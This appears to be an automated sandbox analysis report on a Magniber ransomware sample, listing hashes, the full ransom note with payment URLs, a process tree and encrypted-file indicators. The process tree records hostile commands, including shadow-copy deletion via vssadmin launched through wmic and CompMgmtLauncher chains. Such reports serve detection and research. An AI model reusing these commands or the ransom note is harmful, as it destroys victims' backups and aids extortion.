Resubmissions

18-08-2021 23:22

210818-8e7ftqdsax 10

22-05-2021 11:01

210522-avrsva3a7s 10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    18-08-2021 23:22

General

  • Target

    c6b6ec00_by_Libranalysis.exe

  • Size

    22KB

  • MD5

    c6b6ec00b64069d66c8d14d65f7cfd8f

  • SHA1

    b90e6bf12728fa3b0984aabc32b39f1db082a1da

  • SHA256

    7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed

  • SHA512

    c9d7c97c63806e87804c33530f48ba950542ba28421d354cb287c9bf027ff5a853b76200e87eadd3cde0469f4b8c93f8c4bc0e71f5e4aa1cdf33e05c0673254a

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here: http://34704ac06214c040e8csnwyqmwa.erpp3f6j634gmj33.onion/csnwyqmwa
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://34704ac06214c040e8csnwyqmwa.jobsbig.cam/csnwyqmwa
http://34704ac06214c040e8csnwyqmwa.nowuser.casa/csnwyqmwa
http://34704ac06214c040e8csnwyqmwa.boxgas.icu/csnwyqmwa
http://34704ac06214c040e8csnwyqmwa.bykeep.club/csnwyqmwa
Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://34704ac06214c040e8csnwyqmwa.erpp3f6j634gmj33.onion/csnwyqmwa

http://34704ac06214c040e8csnwyqmwa.jobsbig.cam/csnwyqmwa

http://34704ac06214c040e8csnwyqmwa.nowuser.casa/csnwyqmwa

http://34704ac06214c040e8csnwyqmwa.boxgas.icu/csnwyqmwa

http://34704ac06214c040e8csnwyqmwa.bykeep.club/csnwyqmwa

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 4 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Users\Admin\AppData\Local\Temp\c6b6ec00_by_Libranalysis.exe
      "C:\Users\Admin\AppData\Local\Temp\c6b6ec00_by_Libranalysis.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1028
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1728
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          PID:760
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1408
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1168
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1244
  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1108
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1712
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://34704ac06214c040e8csnwyqmwa.jobsbig.cam/csnwyqmwa^&1^&49714945^&66^&315^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://34704ac06214c040e8csnwyqmwa.jobsbig.cam/csnwyqmwa&1&49714945&66&315&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1796
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1796 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1396
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1752
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1532
  • C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:980
  • C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:636
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2128
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2376
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1416
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2232
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2392
  • C:\Windows\system32\CompMgmtLauncher.exe
    CompMgmtLauncher.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\system32\wbem\wmic.exe
      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
      PID:2332
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1272
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1572
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2340
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2580
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2604
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2616
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2668
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:2692

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\Desktop\ApproveOpen.php.csnwyqmwa

    MD5

    42081712abd2f0d8c0fdfd51dad256c8

    SHA1

    68f2e039908f6193ebad5fd453b99d4fdb681ff0

    SHA256

    3d6643dd6b280d6d90fb1e3872a9490d19a60766c76219f2c225cf94ecd8dcfc

    SHA512

    6115effac04c4e52ef8533265014f9b438b4142e3a7106c11016c6aaf3ac0220400eff6b8bdb644723e076ea5ea30c5579fc3f057f221ff97214c6445ececc4b

  • C:\Users\Admin\Desktop\CheckpointUnlock.svgz.csnwyqmwa

    MD5

    0e9d64d1b644771563a40872ac1f6329

    SHA1

    cb0d41b49c40c4f9a86bc9ac2b59db130b9caa3b

    SHA256

    391920a85a603e2409fd8ec4d34c996848bfed0bd90f1ea4c9bbd650034f85ad

    SHA512

    3622bdb7afc44d6d59240e9181c8e4ca49b8862f21b43cb9767a39b477050d6d3030a8dcdc1b014b05cc0af3eb83716c271a23037649b6b0442ee8acb7a754fb

  • C:\Users\Admin\Desktop\EditGet.mpeg.csnwyqmwa

    MD5

    659159fa0ab864d7ced24615e1a58264

    SHA1

    b076a1bc0f856089bcf57c38a1c952e4e7642eaf

    SHA256

    2803787dbc33e9f773075cb54adb92be2c4a1aa8ff0066d3e580d3df0caeddb2

    SHA512

    e181f2e6b486044e4f16f85def2f8eb748f4bfbae1dfb589fbf9465f3cd501cb57464dd76da41f733a44ce2186aefbde6ffc22f723060dfb5522529988d5f535

  • C:\Users\Admin\Desktop\EnableExport.wmv.csnwyqmwa

    MD5

    bbaa3cd7b906c70166dfbe7b7223283e

    SHA1

    819f182ce15a091a58c00e155ad0b19de23e3e05

    SHA256

    6fcf252451982d0c87b6f3713b59fdd7a5786146862fcafe66fda8362a417970

    SHA512

    26ae060e2cad3e6dbc25a6b7b3ccb38832ce07b6bc04312bd333708dc492931cb56577171b3f7b8432fbe3eadeaba796dcea09a7067112baee9604c1e3810fc2

  • C:\Users\Admin\Desktop\HideUse.dotx.csnwyqmwa

    MD5

    2542ed56f85ed4cd05fbea67e8b60552

    SHA1

    cd12067382e9de10fbcdb77856f8dc1a70ec185c

    SHA256

    a1b8b319a4d153c4741f76300d4226238eec14a8151cf4f8e3b952cab6d6e0b3

    SHA512

    93e0539b6271524292fc45f20e9fcb901bf39ace148a6c9d0015c616ef136798e982d79014fc2acb83302f6f10c8879a5c877be3e4e25296fbf7a402bba90784

  • C:\Users\Admin\Desktop\MergeMove.dxf.csnwyqmwa

    MD5

    d26c00c37d5991d48c928307a6a4776c

    SHA1

    762f7aa3c0d03d9ea9e3118095121295af9bbcfd

    SHA256

    22e71d17137dae851d3c84892117fb953e2ac3273c95ce6f57abc6759397c76b

    SHA512

    e2adc0b1e457d681b7f51f44679077918eeee9462a86798a0025574e32e0adaadf499bb6fc2b8d1ce45e786d748e2b334dd2118e4f424a12a45aa22eaddbcadf

  • C:\Users\Admin\Desktop\PopWatch.zip.csnwyqmwa

    MD5

    d35ae5207fd40e47a3c085c75d64ce13

    SHA1

    33f359f7f6a9f5d9a0acbc44ac219d8e0b51a3d1

    SHA256

    4fbf1806f781ec7529faec789601aeda53806e1e00d99ec147f1544e07ac21dd

    SHA512

    aa7819041f9cebda33d1cf62c3651abdd5c91a98c0b142e9c047f12ed7c9cd5c9d15e290d5472663691dc5db52a7ec5ba17395477cb886dbd0172baaf7c00857

  • C:\Users\Admin\Desktop\ReceiveLimit.bmp.csnwyqmwa

    MD5

    12971c1b25aef17552833b8ef8c35403

    SHA1

    9cc61c27a29a11e84ca783a665686f87324971bf

    SHA256

    5fdfa94a5f0b8c7a09fc55ea50250894fa193490054abaec1111e1bb61322397

    SHA512

    a8cd82b22aa097e7830c349177b56da02e5b13e01d32de1a0ec354c9471ec903b190e1a3567a969a3974445ca217cdc54dedd8cb63448de9e31bc5260e29b50b

  • C:\Users\Admin\Desktop\ShowPublish.mov.csnwyqmwa

    MD5

    1025208bc0d6cb27a87b5928cbfe3d57

    SHA1

    40d597edd2e7722ad0a84a283cfa42757833e6b8

    SHA256

    3364b9a4d035e3637042f24c20c7a30b8918407dac27169683206e7eae644ec2

    SHA512

    66ac94177e1607193cdd5c49f9ff7ae0e9388a6a6c002a8958d66ca4ad356a16bed6c8395107bcd0daacba2af86f87e946905ead6c40aa75f7240689da2f956e

  • C:\Users\Admin\Desktop\readme.txt

    MD5

    a7003039257ddcb43b7583a47852c4c1

    SHA1

    785ba41e3b5330e4a2a381181b7c6e6293c60c27

    SHA256

    0123ee0e82e3a162dead3dbf721475adc2a7b0a55dd4f321380985e98ed1c18d

    SHA512

    9a86cb573a6b4a5566a4ae6d180914db9c68a7ff85117f372e64190f0ff923c1c0fc537fb298068cbfed1ed9dcd15b3021dd0d1a7ac53c9a8b1100ab47b13e40

  • C:\Users\Public\readme.txt

    MD5

    a7003039257ddcb43b7583a47852c4c1

    SHA1

    785ba41e3b5330e4a2a381181b7c6e6293c60c27

    SHA256

    0123ee0e82e3a162dead3dbf721475adc2a7b0a55dd4f321380985e98ed1c18d

    SHA512

    9a86cb573a6b4a5566a4ae6d180914db9c68a7ff85117f372e64190f0ff923c1c0fc537fb298068cbfed1ed9dcd15b3021dd0d1a7ac53c9a8b1100ab47b13e40

  • memory/636-87-0x0000000000000000-mapping.dmp

  • memory/760-88-0x0000000000000000-mapping.dmp

  • memory/980-86-0x0000000000000000-mapping.dmp

  • memory/1028-62-0x00000000001F0000-0x00000000001F1000-memory.dmp

    Filesize

    4KB

  • memory/1028-61-0x00000000001E0000-0x00000000001E1000-memory.dmp

    Filesize

    4KB

  • memory/1028-60-0x0000000000020000-0x0000000000025000-memory.dmp

    Filesize

    20KB

  • memory/1196-63-0x0000000003AA0000-0x0000000003AB0000-memory.dmp

    Filesize

    64KB

  • memory/1244-71-0x0000000000000000-mapping.dmp

  • memory/1396-89-0x0000000000000000-mapping.dmp

  • memory/1408-81-0x0000000000000000-mapping.dmp

  • memory/1532-82-0x0000000000000000-mapping.dmp

  • memory/1712-65-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

    Filesize

    8KB

  • memory/1712-64-0x0000000000000000-mapping.dmp

  • memory/1728-83-0x0000000000000000-mapping.dmp

  • memory/1732-67-0x0000000000000000-mapping.dmp

  • memory/1752-68-0x0000000000000000-mapping.dmp

  • memory/1796-84-0x0000000000000000-mapping.dmp

  • memory/2128-90-0x0000000000000000-mapping.dmp

  • memory/2140-91-0x0000000000000000-mapping.dmp

  • memory/2156-92-0x0000000000000000-mapping.dmp

  • memory/2232-96-0x0000000000000000-mapping.dmp

  • memory/2332-98-0x0000000000000000-mapping.dmp

  • memory/2340-99-0x0000000000000000-mapping.dmp

  • memory/2376-100-0x0000000000000000-mapping.dmp

  • memory/2392-101-0x0000000000000000-mapping.dmp